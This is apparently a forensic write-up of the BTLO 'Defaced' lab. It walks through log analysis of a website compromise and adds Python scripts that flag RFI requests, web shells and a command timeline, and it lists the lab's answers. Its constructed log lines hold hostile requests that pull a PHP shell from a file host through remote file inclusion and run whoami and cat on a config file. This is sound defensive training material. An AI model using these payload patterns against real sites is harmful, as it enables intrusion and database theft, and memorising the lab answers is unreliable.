
BTLO - Defaced - Write-Up

Scenario

Mike is a young entrepreneur that recently started a pharmaceutical company online that supplies personal health products. As the business is growing at a rapid pace, Mike pressured the developers to create a website as quickly as possible and disregarded time-consuming security measures. Unsurprisingly, after the website went live it was defaced by a threat actor that also stole all the database records.

What is the signature left by the threat actor that compromised the website?

First things first, let’s get to know some deeper scenario details and get familiar with what we’re working on by reading the Scenario.txt on the desktop, and then look into the files in Investigation Files directory, also on the desktop.

Opening the After.JPG image file we can easily find the answer to the first question, which is Team ApashKirikiri2.0.

After.JPG

The attacker deleted some files. What are they?

If you read the scenario details you’ll know that you’re also provided two screenshots from the file integrity monitoring software, so the answer, access_log and error_log, can be found in one of those screenshots in the Investigation Files directory.

What is the scanner used by the attacker to identify the vulnerability?

Not going to lie, this one had me stumped for quite a while, and judging from the BTLO Discord server I was far from the only one. Generally you’d start by looking at user agent strings in the log files, but in this case none can be found at all.

Ultimately I just ended up figuring out which enumeration tools exist and could possibly have been used here, and ended up with the correct answer being nikto. This can be confirmed with log analysis as there are some hits that do in fact identify nikto, but I still feel that it was a bit more about luck instead of skill.

Which PHP page is vulnerable to Remote File Inclusion (RFI)?

Since we know we’re looking for a PHP file that returned a successful response, we can use the search query `response: 200 AND request: *.php` to limit our search to successful responses to PHP file requests, and that way we can quickly see that the answer to this question is getimagesonly.php due to the way the HTTP request is formatted (the page is asked to include a file from a remote URL).

Elasticsearch

What is the IP address of the remote attacker?

This builds directly on the previous question: since we know RFI was used, we can make an educated guess that the source IP address of that request is the correct answer, and it is. So 91.192.103.35 is the right answer here.

Alternatively, we could filter by clientip to see how many requests each IP address has made; this one is by far the most active, which alone warrants a closer look at it.

What is the name of the PHP shell?

Yet another PHP file to look up. Filtering for PHP files followed by a ? (that is, PHP scripts called with a query string) narrows the list down to those likely to be the shell, and we do find a file named backdoor.jpg.php which has been used to run multiple commands, so we’ve found our suspect.

Elasticsearch

The attacker downloaded the PHP shell from a file-hosting website. What is the name of the website?

Since we now know the filename of the PHP shell we can also look up the origin of it by just searching for backdoor.jpg.php, and in addition to the file being used on the infected server we can find a mediafire.com download link which was used via the vulnerable getimagesonly.php file we found previously. We can also see another file called webshell.php pulled, but it was not used.
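The last four questions (the RFI page, the attacker IP, the web shell and where it was downloaded from) are all answered by the same kind of log filtering, so here is an added example, not from the write-up or the lab, that performs that triage offline over an Apache access log instead of in Kibana. The log lines are constructed; the IP address, file names and hosting site are the ones the write-up names, while the query parameter names (`file=`, `cmd=`) and the `PLACEHOLDER` path segment are assumptions.

```python
"""Added example (not from the BTLO write-up): triage an Apache access log for
an RFI page, the noisiest client, a double-extension web shell and the host
the shell was fetched from.  All input below is constructed."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample in Apache "combined" format.  Parameter names file= and
# cmd= are assumptions; the IP, file names and hosting site are from the write-up.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2021:17:01:02 +0000] "GET /MikePharmaSystem/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Feb/2021:17:01:09 +0000] "GET /MikePharmaSystem/getimagesonly.php?file=banner.jpg HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
91.192.103.35 - - [18/Feb/2021:17:05:10 +0000] "GET /MikePharmaSystem/getimagesonly.php?file=http://www.mediafire.com/PLACEHOLDER/backdoor.jpg.php HTTP/1.1" 200 1024 "-" "-"
91.192.103.35 - - [18/Feb/2021:17:05:31 +0000] "GET /MikePharmaSystem/getimagesonly.php?file=http://www.mediafire.com/PLACEHOLDER/webshell.php HTTP/1.1" 200 980 "-" "-"
91.192.103.35 - - [18/Feb/2021:17:12:44 +0000] "GET /MikePharmaSystem/backdoor.jpg.php?cmd=whoami HTTP/1.1" 200 64 "-" "-"
91.192.103.35 - - [18/Feb/2021:17:13:20 +0000] "GET /MikePharmaSystem/backdoor.jpg.php?cmd=cat%20/opt/lampp/htdocs/MikePharmaSystem/config.php HTTP/1.1" 200 310 "-" "-"
10.0.0.9 - - [18/Feb/2021:17:13:50 +0000] "GET /MikePharmaSystem/products.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [ts] "method target proto" status size "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Double extension such as .jpg.php, a classic way past an image-only upload filter.
DOUBLE_EXT_RE = re.compile(r"\.[a-z0-9]{2,4}\.php$", re.I)


def parse_log(text):
    """Parse combined-format lines into dicts with the path and decoded query params."""
    entries = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # skip anything that is not a well-formed access-log line
        e = m.groupdict()
        parts = urlsplit(e["target"])
        e["path"] = parts.path
        e["params"] = parse_qs(parts.query)  # parse_qs also percent-decodes values
        entries.append(e)
    return entries


def find_rfi_requests(entries):
    """Successful requests to .php pages where a parameter value is itself a URL:
    the shape of a remote file inclusion.  Returns (ip, script, param, url)."""
    hits = []
    for e in entries:
        if e["status"] != "200" or not e["path"].endswith(".php"):
            continue
        for name, values in e["params"].items():
            for v in values:
                if v.lower().startswith(("http://", "https://", "ftp://")):
                    hits.append((e["ip"], e["path"].rsplit("/", 1)[-1], name, v))
    return hits


def top_client_ips(entries, n=3):
    """Most active client IPs, the equivalent of a clientip terms aggregation."""
    return Counter(e["ip"] for e in entries).most_common(n)


def find_webshell_candidates(entries):
    """PHP scripts called with a query string whose name has a double extension.
    Returns {script name: number of requests}."""
    found = Counter()
    for e in entries:
        script = e["path"].rsplit("/", 1)[-1]
        if e["params"] and DOUBLE_EXT_RE.search(script):
            found[script] += 1
    return dict(found)


def download_origins(entries, filename):
    """Remote hosts from which `filename` was pulled through an RFI request."""
    return sorted({urlsplit(url).hostname for _, _, _, url in find_rfi_requests(entries)
                   if url.rsplit("/", 1)[-1] == filename})


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print("RFI requests:", find_rfi_requests(entries))
    print("Top client IPs:", top_client_ips(entries))
    print("Web shell candidates:", find_webshell_candidates(entries))
    print("backdoor.jpg.php fetched from:", download_origins(entries, "backdoor.jpg.php"))
```

Note that the local include `file=banner.jpg` is deliberately left out of the RFI hits: the check fires only when the parameter value carries a scheme, which is what separates remote inclusion from ordinary image loading in this log.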

What time was the first command executed through the PHP shell?

Looking up the usage of the backdoor.jpg.php file we can easily find the commands that were run using it, and we can see when they were run. Do note that the time in the original syslog file and the time shown in the UI are not the same, and the ones asked for by BTLO are the syslog times.

Long story short, the first command run was whoami and it was run at 18/02/2021 17:12:44.

Elasticsearch

Which config file does the attacker attempt to read using the command ‘cat’?

Here we can either keep digging through the listings returned by our search filter on the backdoor file, or we can guess that the config file’s name contains "config"; either way we end up with the answer to this question: /opt/lampp/htdocs/MikePharmaSystem/config.php.

Elasticsearch

At what time was the database dumped by the attacker?

Akin to the previous question, we can guess that the database export will have the letters db somewhere in the message string, and sure enough it does. Finding the log entry for db_export.php and using its syslog timestamp of 18/02/2021 17:14:59 gives us our answer.

Elasticsearch

The attacker exfiltrated the database records. What is the database name?

Having found the database export log entry we can also find the database name in that message, so entering Mike_Pharmaceuticals clears the final question and this exercise.
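The timeline questions above (first command, the cat of the config file, the database dump and its name) all hinge on the caveat that the time Kibana renders is not the time written in the original log line. Here is an added example, not from the write-up or the lab, that reconstructs that timeline from Elasticsearch-style hits and reports the source timestamp rather than the UI one. The hits are constructed; the field names clientip, request and response are the ones the write-up searches on, the raw line is kept in `message` and assumed to carry an Apache `[dd/Mon/yyyy:HH:MM:SS +0000]` stamp, and the parameter names (`cmd=`, `db=`) and the browser's UTC+2 offset are assumptions.

```python
"""Added example (not from the BTLO write-up): build the web shell command
timeline from Elasticsearch hits and answer with the timestamp in the original
log line, not the browser-local time Kibana shows.  All hits are constructed."""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed hits, deliberately out of order.  @timestamp is UTC as indexed;
# `message` is the raw line the shipper read.  cmd= and db= are assumed names.
HITS = [
    {"@timestamp": "2021-02-18T17:14:59.000Z", "clientip": "91.192.103.35", "response": 200,
     "request": "/MikePharmaSystem/db_export.php?db=Mike_Pharmaceuticals",
     "message": '91.192.103.35 - - [18/Feb/2021:17:14:59 +0000] "GET /MikePharmaSystem/db_export.php?db=Mike_Pharmaceuticals HTTP/1.1" 200 9000 "-" "-"'},
    {"@timestamp": "2021-02-18T17:12:44.000Z", "clientip": "91.192.103.35", "response": 200,
     "request": "/MikePharmaSystem/backdoor.jpg.php?cmd=whoami",
     "message": '91.192.103.35 - - [18/Feb/2021:17:12:44 +0000] "GET /MikePharmaSystem/backdoor.jpg.php?cmd=whoami HTTP/1.1" 200 64 "-" "-"'},
    {"@timestamp": "2021-02-18T17:10:00.000Z", "clientip": "10.0.0.5", "response": 200,
     "request": "/MikePharmaSystem/index.php",
     "message": '10.0.0.5 - - [18/Feb/2021:17:10:00 +0000] "GET /MikePharmaSystem/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"'},
    {"@timestamp": "2021-02-18T17:13:20.000Z", "clientip": "91.192.103.35", "response": 200,
     "request": "/MikePharmaSystem/backdoor.jpg.php?cmd=cat%20/opt/lampp/htdocs/MikePharmaSystem/config.php",
     "message": '91.192.103.35 - - [18/Feb/2021:17:13:20 +0000] "GET /MikePharmaSystem/backdoor.jpg.php?cmd=cat%20/opt/lampp/htdocs/MikePharmaSystem/config.php HTTP/1.1" 200 310 "-" "-"'},
]

STAMP_RE = re.compile(r"\[(\d{2}/[A-Za-z]{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]")
ANSWER_FMT = "%d/%m/%Y %H:%M:%S"  # the dd/mm/yyyy form the write-up answers in


def source_time(hit):
    """Timestamp the web server itself wrote, pulled from the raw log line."""
    m = STAMP_RE.search(hit["message"])
    return datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S %z").strftime(ANSWER_FMT)


def ui_time(hit, browser_offset_hours=2):
    """What Kibana would render for @timestamp in a browser set to UTC+2 (assumed)."""
    stamp = datetime.fromisoformat(hit["@timestamp"].replace("Z", "+00:00"))
    local = stamp.astimezone(timezone(timedelta(hours=browser_offset_hours)))
    return local.strftime(ANSWER_FMT)


def _script_and_params(hit):
    parts = urlsplit(hit["request"])
    return parts.path.rsplit("/", 1)[-1], {k: v[0] for k, v in parse_qs(parts.query).items()}


def shell_commands(hits, shell):
    """(source_time, command) for every cmd= request to `shell`, oldest first."""
    out = []
    for hit in sorted(hits, key=lambda h: h["@timestamp"]):
        script, params = _script_and_params(hit)
        if script == shell and "cmd" in params:
            out.append((source_time(hit), params["cmd"]))
    return out


def first_command(hits, shell):
    cmds = shell_commands(hits, shell)
    return cmds[0] if cmds else None


def files_read(hits, shell):
    """Paths read with cat through the shell."""
    return [cmd.split(None, 1)[1] for _, cmd in shell_commands(hits, shell)
            if cmd.startswith("cat ")]


def db_dump(hits):
    """Source time of the db_export.php request and the database it names."""
    for hit in sorted(hits, key=lambda h: h["@timestamp"]):
        script, params = _script_and_params(hit)
        if script == "db_export.php":
            return source_time(hit), params.get("db")
    return None


if __name__ == "__main__":
    for when, cmd in shell_commands(HITS, "backdoor.jpg.php"):
        print(when, cmd)
    print("first command:", first_command(HITS, "backdoor.jpg.php"))
    print("UI would show the first command at:", ui_time(HITS[1]))
    print("files read:", files_read(HITS, "backdoor.jpg.php"))
    print("db dump:", db_dump(HITS))
```

The two-hour difference between `source_time` and `ui_time` for the same hit is the trap the write-up warns about: the answer key wants the stamp from the log line, so anything that reads `@timestamp` through a timezone-aware display has to be converted back before it is submitted.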

This post is licensed under CC BY 4.0 by the author.